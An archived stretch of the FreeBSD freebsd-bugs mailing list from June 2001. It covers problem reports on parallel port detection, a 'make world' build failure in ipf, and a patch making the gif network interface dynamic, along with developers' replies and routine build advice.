X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.3-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: iedowse@FreeBSD.org Cc: freebsd-bugs@FreeBSD.org Subject: Re: i386/14135: lpt1 nolonger exists after 3.2-RELEASE References: <200106070050.f570oAT39220@freefall.freebsd.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org iedowse@FreeBSD.org wrote: > Synopsis: lpt1 nolonger exists after 3.2-RELEASE > > State-Changed-From-To: open->feedback > State-Changed-By: iedowse > State-Changed-When: Wed Jun 6 17:48:33 PDT 2001 > State-Changed-Why: > > Is this still a problem in more recent releases? > > http://www.FreeBSD.org/cgi/query-pr.cgi?pr=14135 4.3-RELEASE seems even worse. If the second parallel port is installed (3BC), none of lpt0, lpt1, and ppi0 will be configured. That is, entire parallel system is disabled if a second parallel port (ISA board) is installed. I do not have a PIC parallel board to test, so I don't know if PCI parallel works. -Jin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 20:50:10 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EE56637B40A for ; Sat, 9 Jun 2001 20:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5A3o1l88016; Sat, 9 Jun 2001 20:50:01 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BAFD437B405 for ; Sat, 9 Jun 2001 20:45:24 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5A3jO387775; Sat, 9 Jun 2001 20:45:24 -0700 (PDT) (envelope-from nobody) Message-Id: <200106100345.f5A3jO387775@freefall.freebsd.org> Date: Sat, 9 Jun 2001 20:45:24 -0700 (PDT) From: reel@sympatico.ca To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: i386/28002: make world fails (ref. to ipf) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 28002 >Category: i386 >Synopsis: make world fails (ref. to ipf) >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Jun 09 20:50:01 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Félix-Antoine Paradis >Release: FreeBSD 4.3-STABLE >Organization: Unix Consult Organization >Environment: FreeBSD idemnia.ath.cx 4.3-STABLE FreeBSD 4.3-STABLE #0: Mon May 28 17:42:29 EDT 2001 reel@idemnia.ath.cx:/usr/src/sys/compile/ZEUS i386 >Description: When doing a "make world", it seems that it has a problem with sys/netinet/ip_compat.h I get the message: ===> sbin/ipf make: don't know how to make /usr/src/sbin/ipf/../../sys/netinet/ip_compat.h. St op *** Error code 2 1 error [four Error code 2] I cvsup'd today twice and I make world twice (it occured twice). >How-To-Repeat: CVSup from cvsup2.freebsd.org for 4.3-STABLE (releng4) and then, usual things for make world: cd /usr/src make world Then, it breaks. :| >Fix: not at the moment. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 21:19: 9 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from odin.ac.hmc.edu (Odin.AC.HMC.Edu [134.173.32.75]) by hub.freebsd.org (Postfix) with ESMTP id 4F6E037B407; Sat, 9 Jun 2001 21:19:02 -0700 (PDT) (envelope-from brdavis@odin.ac.hmc.edu) Received: (from brdavis@localhost) by odin.ac.hmc.edu (8.11.0/8.11.0) id f5A4J2u17698; Sat, 9 Jun 2001 21:19:02 -0700 Date: Sat, 9 Jun 2001 21:19:02 -0700 From: Brooks Davis To: bugs@freebsd.org Cc: FreeBSD-gnats-submit@freebsd.org Subject: Re: kern/27983: [PATCH] make gif fully dynamic Message-ID: <20010609211902.B17310@Odin.AC.HMC.Edu> References: <20010609022051.DE1CE24D1F@minya.sea.one-eyed-alien.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010609022051.DE1CE24D1F@minya.sea.one-eyed-alien.net>; from brooks@one-eyed-alien.net on Fri, Jun 08, 2001 at 07:20:51PM -0700 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I've created an updated patch which corrects a return code for the ioctl and changes to syntax for creation and deletion to the Solaris like plumb and unplumb commands. It also doesn't break existing scripts like the old one did. As before, apply with: cd /usr/src mkdir sys/modules/if_gif patch < /tmp/gif.diff The patch is online at: http://www.one-eyed-alien.net/~brooks/FreeBSD/gif.diff -- Brooks To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 21:20: 5 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 180A537B401 for ; Sat, 9 Jun 2001 21:20:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5A4K3T92198; Sat, 9 Jun 2001 21:20:03 -0700 (PDT) (envelope-from gnats) Date: Sat, 9 Jun 2001 21:20:03 -0700 (PDT) Message-Id: <200106100420.f5A4K3T92198@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Brooks Davis Subject: Re: kern/27983: [PATCH] make gif fully dynamic Reply-To: Brooks Davis Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/27983; it has been noted by GNATS. From: Brooks Davis To: bugs@freebsd.org Cc: FreeBSD-gnats-submit@freebsd.org Subject: Re: kern/27983: [PATCH] make gif fully dynamic Date: Sat, 9 Jun 2001 21:19:02 -0700 I've created an updated patch which corrects a return code for the ioctl and changes to syntax for creation and deletion to the Solaris like plumb and unplumb commands. It also doesn't break existing scripts like the old one did. As before, apply with: cd /usr/src mkdir sys/modules/if_gif patch < /tmp/gif.diff The patch is online at: http://www.one-eyed-alien.net/~brooks/FreeBSD/gif.diff -- Brooks To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 22:50: 5 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8D29A37B401 for ; Sat, 9 Jun 2001 22:50:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5A5o3v03583; Sat, 9 Jun 2001 22:50:03 -0700 (PDT) (envelope-from gnats) Date: Sat, 9 Jun 2001 22:50:03 -0700 (PDT) Message-Id: <200106100550.f5A5o3v03583@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Peter Wemm Subject: Re: i386/28002: make world fails (ref. to ipf) Reply-To: Peter Wemm Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR i386/28002; it has been noted by GNATS. From: Peter Wemm To: reel@sympatico.ca Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: i386/28002: make world fails (ref. to ipf) Date: Sat, 09 Jun 2001 22:44:47 -0700 reel@sympatico.ca wrote: > >Description: > When doing a "make world", it seems that it has a problem with > sys/netinet/ip_compat.h > I get the message: > ===> sbin/ipf > make: don't know how to make /usr/src/sbin/ipf/../../sys/netinet/ip_compat.h. This is because of either: 1) You are using 'make -DNOCLEAN world' (dont do this) and you have a stale .depend file or 2) Something is stale in your obj directory. rm -rf /usr/obj/* Cheers, -Peter -- Peter Wemm - peter@FreeBSD.org; peter@yahoo-inc.com; peter@netplex.com.au "All of this is for nothing if we don't go to the stars" - JMS/B5 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 23: 7:32 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from tomts6-srv.bellnexxia.net (tomts6.bellnexxia.net [209.226.175.26]) by hub.freebsd.org (Postfix) with ESMTP id A901B37B401 for ; Sat, 9 Jun 2001 23:07:28 -0700 (PDT) (envelope-from reel@sympatico.ca) Received: from HSE-QuebecCity-ppp80754.qc.sympatico.ca ([64.229.233.181]) by tomts6-srv.bellnexxia.net (InterMail vM.4.01.03.16 201-229-121-116-20010115) with ESMTP id <20010610060727.YJZY11207.tomts6-srv.bellnexxia.net@HSE-QuebecCity-ppp80754.qc.sympatico.ca>; Sun, 10 Jun 2001 02:07:27 -0400 Date: Sun, 10 Jun 2001 02:07:27 -0400 (EDT) From: Felix-Antoine Paradis X-X-Sender: To: Peter Wemm Cc: Subject: Re: i386/28002: make world fails (ref. to ipf) In-Reply-To: <200106100550.f5A5o3v03583@freefall.freebsd.org> Message-ID: <20010610020648.H30339-100000@idemnia.ath.cx> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org That's right. I think you can close it. I will go to sleep too ;> F=E9lix-Antoine Paradis - reel@sympatico.ca && 1-418-261-0865 && 0xAF358809 - Qu=E9bec, Canada - Unix Consult Organization - "Obest plerumque iis qui discere volunt auctoritas eorum qui docent" - Cic=E9ron To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message